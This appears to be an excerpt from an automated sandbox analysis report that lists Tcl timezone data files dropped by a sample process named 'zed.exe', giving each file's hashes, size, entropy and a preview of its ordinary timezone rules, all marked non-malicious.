                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE/qlOi+4IAcGEu5B:SlSWB9vsM3y7oDSHAIgpdN/290/qlf+M
                                                                                                                                                                                                                                            MD5:5A45B70C79F533548B3DD332F988E15B
                                                                                                                                                                                                                                            SHA1:C7485828619A1D4F5CA59D80ABD197100AC58F64
                                                                                                                                                                                                                                            SHA-256:518BEB6E54AE811F8C725EA8CC42787D48FC605A3476D6E7A00A1B5733CBD6AC
                                                                                                                                                                                                                                            SHA-512:A81C2EBE282E019ED011EADDB8F74C3E6FBE88D87E8D8706B3022CDCC48EF92AD90F9BCF9F25031664BB6EFE069EAFDD23D9B55BF672FC7528A2DD8CB6B986B4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Atikokan) $TZData(:America/Panama)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):4.812527147763069
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/2IAcGE/ol7x+IAcGs:SlSWB9vsM3y7/yrHAIgp/yH0AN/290/e
                                                                                                                                                                                                                                            MD5:13479F64BFBDC7583C637E1562C454B4
                                                                                                                                                                                                                                            SHA1:2F59484C779B0D6033FC14E205DA9BCAB7A5FCB1
                                                                                                                                                                                                                                            SHA-256:1D6FEE336E71FFFB64874A830C976867C071EBF6B133C296B32F87E3E7D814C9
                                                                                                                                                                                                                                            SHA-512:D2C5D35BBBDAB8D58BF6185328124796C06B67ADFB4C1828BA5A9CCA500A01BB8BE69635AE7EEA7FA837A27B20D488A08A29B121DD1617BC373390AD95D67E39
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:America/Atka) $TZData(:America/Adak)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2012
                                                                                                                                                                                                                                            Entropy (8bit):3.703391569010329
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5/ChlvEw6kSSx5H4a8tf3fku+da2XUd23t8VZDG8+GyOd:VIlvEwJSSxdF8tfMu+da2kdCt8VZy8+K
                                                                                                                                                                                                                                            MD5:69DCC2477D8D81E2F49D295DB6907190
                                                                                                                                                                                                                                            SHA1:3C6ED0CEF15D3265C962873480EE1809A4DCACA2
                                                                                                                                                                                                                                            SHA-256:64F1EC14F6B43FF10B564F839152E88DF9262F0947D1DB347557FA902F6FD48C
                                                                                                                                                                                                                                            SHA-512:71DEA6D47F267AA7326A011872FA74762FA4F8CD57EB149E3B56B3DE9097B0B9258BC4F6C29188B49FC60C1942869B92D9E59FEE6980A5DA5D0029C383D99F39
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia) {.. {-9223372036854775808 -9244 0 LMT}.. {-1767216356 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2073
                                                                                                                                                                                                                                            Entropy (8bit):4.021485901155292
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:56hey9WUQwuz/V/NF01Y3A6S++S+vS+QQS+1S+9fS+BrS+HoS+8S+/N5S+5zNZf+:5pUIdFS1Y3FUlWQnH7eelN5Lh9LY5Lj
                                                                                                                                                                                                                                            MD5:4655AE5AB9C39CA05C1FF36FC366679F
                                                                                                                                                                                                                                            SHA1:F3F1D08EC35907A8F45AA2CFD097F6DCCA75C9B8
                                                                                                                                                                                                                                            SHA-256:A6233E5BB0D3B30D0E3B94CD797718041AC3C2E75B387D6646A5C0376C5591CD
                                                                                                                                                                                                                                            SHA-512:3915B845A312147C5B047096033B3D153E4E83AF4C8E4AAA73C8D12E2A8386CFE8EC4568730F9F28863017A60622DD9CC7D97991C966779B4068BC29F6C6B2B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia_Banderas) {.. {-9223372036854775808 -25260 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):648
                                                                                                                                                                                                                                            Entropy (8bit):4.251560000277241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290eWmdH9Colj/uFkv/lC1/uFkOzQs/lps/Ozfah/OzT/lN/uFkX/ll/uFki:5TWeUo5Skv/Y1SkA/g/Bh/m/rSkX/zSt
                                                                                                                                                                                                                                            MD5:DC4FA44B2174A4E6F0644FA8EA2E83F9
                                                                                                                                                                                                                                            SHA1:C12DF8C862A05D569EAF189272F8BF44303595A1
                                                                                                                                                                                                                                            SHA-256:FD5E04136506C6543A9ACDC890A30BCF0D561148E1063EC857E3913DE1EBA404
                                                                                                                                                                                                                                            SHA-512:5AC307CD48132B57215CCBAF0BB63F7FA9C5B28DC9F6217C905885D75B0DF131238D4DB2AE707C3DDEE2EDE6C0914644B435FB1CDD9913600D8B69AE95578B0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Barbados) {.. {-9223372036854775808 -14309 0 LMT}.. {-1841256091 -14400 0 AST}.. {-874263600 -10800 1 ADT}.. {-862682400 -14400 0 AST}.. {-841604400 -10800 1 ADT}.. {-830714400 -14400 0 AST}.. {-820526400 -14400 0 -0330}.. {-811882800 -12600 1 AST}.. {-798660000 -14400 0 -0330}.. {-788904000 -14400 0 AST}.. {234943200 -10800 1 ADT}.. {244616400 -14400 0 AST}.. {261554400 -10800 1 ADT}.. {276066000 -14400 0 AST}.. {293004000 -10800 1 ADT}.. {307515600 -14400 0 AST}.. {325058400 -10800 1 ADT}.. {338706000 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1031
                                                                                                                                                                                                                                            Entropy (8bit):3.8842563546204225
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5fe300cChlrLPsw6kSS3h5R14eH8tf3xd:5+CChlvEw6kSSx5H4a8tf3xd
                                                                                                                                                                                                                                            MD5:DFA5E50F6AEF1311A4CF74970477E390
                                                                                                                                                                                                                                            SHA1:5B63676EB8039B2BE767BAA44820F2DAE5B62876
                                                                                                                                                                                                                                            SHA-256:549625CCB30BD0E025BAC47668BA3AA0CDD8569E5887E483C8D62B5B7302FA50
                                                                                                                                                                                                                                            SHA-512:4BBB43694E3B54339C549AC3A5488B77366DB1189D8D1834DCF618D9448084A950B575E207064521B1CDFD2E41F7D1D8C5CD9CEB4668D4459585649556136EB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belem) {.. {-9223372036854775808 -11636 0 LMT}.. {-1767213964 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3284
                                                                                                                                                                                                                                            Entropy (8bit):3.8546064195941097
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5pKSxZwR9IVQU55DG5krgGN8wW+YeD1yyfCwoc:HKSjgIVzrG5krRN8wWheD1yu
                                                                                                                                                                                                                                            MD5:4DA622B685B3B075CC94FC4E23322547
                                                                                                                                                                                                                                            SHA1:DEB23F0A434549DAE1BE60ACF757BB212C907B92
                                                                                                                                                                                                                                            SHA-256:E07F45264E28FD5AA54BD48CB701658509829CF989EC9BD79498D070A1BA270F
                                                                                                                                                                                                                                            SHA-512:9B00BF8870BC4AAEF7F06FCDFEEEF54686A2CC890103696631EB4DEF5AEEAD051EC9069D70A2B22397F18C0067E03A54E75DA18474D6B1BD3BDA2D5313E0AD16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belize) {.. {-9223372036854775808 -21168 0 LMT}.. {-1822500432 -21600 0 CST}.. {-1616954400 -19800 1 -0530}.. {-1606069800 -21600 0 CST}.. {-1585504800 -19800 1 -0530}.. {-1574015400 -21600 0 CST}.. {-1554055200 -19800 1 -0530}.. {-1542565800 -21600 0 CST}.. {-1522605600 -19800 1 -0530}.. {-1511116200 -21600 0 CST}.. {-1490551200 -19800 1 -0530}.. {-1479666600 -21600 0 CST}.. {-1459101600 -19800 1 -0530}.. {-1448217000 -21600 0 CST}.. {-1427652000 -19800 1 -0530}.. {-1416162600 -21600 0 CST}.. {-1396202400 -19800 1 -0530}.. {-1384713000 -21600 0 CST}.. {-1364752800 -19800 1 -0530}.. {-1353263400 -21600 0 CST}.. {-1333303200 -19800 1 -0530}.. {-1321813800 -21600 0 CST}.. {-1301248800 -19800 1 -0530}.. {-1290364200 -21600 0 CST}.. {-1269799200 -19800 1 -0530}.. {-1258914600 -21600 0 CST}.. {-1238349600 -19800 1 -0530}.. {-1226860200 -21600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):206
                                                                                                                                                                                                                                            Entropy (8bit):4.938043196147077
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290F490ppv:MByMYbpwt290S90b
                                                                                                                                                                                                                                            MD5:09FD8280CC890F238126F9641DB7C90E
                                                                                                                                                                                                                                            SHA1:98AB4E0DE8173C2BB2532B07FAE2E71F588AB26F
                                                                                                                                                                                                                                            SHA-256:FACD0A835D1F425CD323EE453ADE231810B2D1CF6EBA227BA1B50522AE3879F7
                                                                                                                                                                                                                                            SHA-512:117C24389B7BFB079F4409B1FA6AA547654D7C69A6CBB19218BF2B96F6CFE3CBAAD400D4C2EFE8A9BFE25F44402057427FC8A62DC20A98018D23A7CF9B87401F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Blanc-Sablon) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1199
                                                                                                                                                                                                                                            Entropy (8bit):3.7988385604912893
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5EThevwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQZ:5EHSeSFESoSQSrSsCSeSPS1cSQSQlSsp
                                                                                                                                                                                                                                            MD5:9529221F9B4E104CC598491703B10E6C
                                                                                                                                                                                                                                            SHA1:5ACD61B525A18DE1919A7484C92EC5D787DF2F25
                                                                                                                                                                                                                                            SHA-256:10592EA1CB0D02C06A61059EC601F70A706A5053AC923B9EED29388D5E71EF3A
                                                                                                                                                                                                                                            SHA-512:66BEDB631469651A5E426155428764E3C1C14483E6FEE1505812E8676EB6E82CF0A88F6CC697F03FDA0AF906D91C7DE6E940DF3D33DD247BEF51DBD9A13DEE16
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boa_Vista) {.. {-9223372036854775808 -14560 0 LMT}.. {-1767211040 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):246
                                                                                                                                                                                                                                            Entropy (8bit):4.705337479465446
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290bJhDm2OHDgoHvcuknov/zEXPKV2kR/uFVEV/KVg:MB86290bLmdHDgCvcukCz8O2Y/uF2/Og
                                                                                                                                                                                                                                            MD5:DB019451A7D678C3E7AEE706283861F6
                                                                                                                                                                                                                                            SHA1:57E63C5372F50CBD1A7FA32688C1B77ADDCC06EB
                                                                                                                                                                                                                                            SHA-256:B6ADC16815DC95E537548CA3572D7F93626A6D1DC390DD4CBABAB5AB855BBA30
                                                                                                                                                                                                                                            SHA-512:6C94B2D7EFA856E6BD41FC45B0E8D16A40E61D8B895397CD71230047FAD4793DDB9ABAAC57D2841549F161C9389D7E61D54D38F1BAC6F13ED3DD4C68CDD3272C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bogota) {.. {-9223372036854775808 -17776 0 LMT}.. {-2707671824 -17776 0 BMT}.. {-1739041424 -18000 0 -05}.. {704869200 -14400 1 -05}.. {733896000 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8605
                                                                                                                                                                                                                                            Entropy (8bit):3.8563913604109064
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:eSwtktXNmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/jXNDPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:005D0BF1320030A7E9CDC97D0C8BB44B
                                                                                                                                                                                                                                            SHA1:CB236DA840A49B4BCD261114DCA38DADA567B091
                                                                                                                                                                                                                                            SHA-256:93AF910CB2AD2203B71C1AD49D56DF4A4A14D07F885AFD4E755271F1372A517C
                                                                                                                                                                                                                                            SHA-512:16A5483392741673BEC020EF6EBE963AB0FB12629D662C586C27A1E9A1BE3FEA8DC3D05A0E84917B8166E48CADA45C74DFABFDC897A6BC94D3C5058D31AD5126
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boise) {.. {-9223372036854775808 -27889 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-1471788000 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126255600 -25200 0 MST}.. {129114000 -21600 0 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):239
                                                                                                                                                                                                                                            Entropy (8bit):4.821972751564724
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MQA+zAHAIgp/MQA+zE5N/290BFzk5h490/MQA+zd:MByMY/MV+zhp/MV+zE5t290rzy490/MW
                                                                                                                                                                                                                                            MD5:6700956D5FE96CEC8D34EB49FF805374
                                                                                                                                                                                                                                            SHA1:69B9973EF31AE204EFED7485E59CEA99E00815C8
                                                                                                                                                                                                                                            SHA-256:DEFC5C9DA2D4D4146145A50D692A6BFF698C3B0A1F19EFD82AD0EE7678F39FCF
                                                                                                                                                                                                                                            SHA-512:A80C03A519F00A4270248E885463090A34B3992B3DEBA94DD6AEBCC50736541655461E4AA10856125B8EF9B92CEB697429EE7088DBC6AB4FAE383FDF11521B7A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Buenos_Aires)]} {.. LoadTimeZoneFile America/Argentina/Buenos_Aires..}..set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7739
                                                                                                                                                                                                                                            Entropy (8bit):3.8713679494465016
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:zsGaLV9T1sF7Lv/PCewtA8CzSPyDLbrcUia:h5lLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:E6AE12CDB55FED492C253E46E2690FE0
                                                                                                                                                                                                                                            SHA1:CD3699E50BC1694827E51E4101C713E52FA646C8
                                                                                                                                                                                                                                            SHA-256:3E0506A54B562DBC3AA6889DDD39B327FE0B85C63B00F0B39D606921A0936A59
                                                                                                                                                                                                                                            SHA-512:BA3D5D5420210E74E74A581C9678224948266828A8FACE06383E41E13475C682F82D288426FB915D618FFE7ED95BD8F1C7E9D59D31CE5B464D5EC1363AB5E340
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cambridge_Bay) {.. {-9223372036854775808 0 0 -00}.. {-1577923200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2918
                                                                                                                                                                                                                                            Entropy (8bit):3.6039149423727013
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:591PSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxSs:5VsE3LMuJALTvn1ZdP7ZbvLfeAh+KIic
                                                                                                                                                                                                                                            MD5:230A9F7A87BA56C30ACB3B1732F823F3
                                                                                                                                                                                                                                            SHA1:8263EA723F2AEA7740C7EC54BE0000A06982D765
                                                                                                                                                                                                                                            SHA-256:6D5BD1355016B03EDEA58DF98BEC26281CD372725B2DCB60B4D748D2FB4346C8
                                                                                                                                                                                                                                            SHA-512:C357AA33833DBBDC6BC7DD3F23469EADDF08564AF17D7EE935C8AEA5F35B6E3BBDE1E181BC0DBF264051C4BE139261055633D191413DD610B0150AB3CDE161AF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Campo_Grande) {.. {-9223372036854775808 -13108 0 LMT}.. {-1767212492 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1412
                                                                                                                                                                                                                                            Entropy (8bit):4.034087321254386
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5s5edTS/uVV3iVP/uaP/uAyAhbS+V8S+FfS+UvS+MS+FB3S+QS+rcS+kS+RS+dSB:5DziZAmELf0On9uhcinzPPoUlWQW3
                                                                                                                                                                                                                                            MD5:7FBCA91F4B7100C4667F24A9AB263109
                                                                                                                                                                                                                                            SHA1:163A77FF9EAC49B00B5F838DF4D47F079ECF6A83
                                                                                                                                                                                                                                            SHA-256:FD6C370F82E5CFE374637E0E222E72570857AC3F85143BEEEF9C3D0E7A6C0D04
                                                                                                                                                                                                                                            SHA-512:124A5D7F58B38F15A90BA48E63D1D38335371D98A2503E691EC6426EB51E87FD61CA05FCA83573DD1DC06DB9E599302C64D226D5DF13B8A62E0A6943318431BE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cancun) {.. {-9223372036854775808 -20824 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {828860400 -14400 1 EDT}.. {846396000 -18000 0 EST}.. {860310000 -14400 1 EDT}.. {877845600 -18000 0 EST}.. {891759600 -14400 1 EDT}.. {902041200 -18000 0 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                                                            Entropy (8bit):4.588048586971241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2909+ETlDm2OHXoHv8HkISlvFVFQVgVJUF/R/OXFxWnVVFQVgVVvR/e:MB86290XmdHXCvydSltvAUeFZ/O/qVva
                                                                                                                                                                                                                                            MD5:5DDB49759D58931A06740A14F76B431C
                                                                                                                                                                                                                                            SHA1:E9AC99265D42D140E12BB4DAAA24FABAC65E79FA
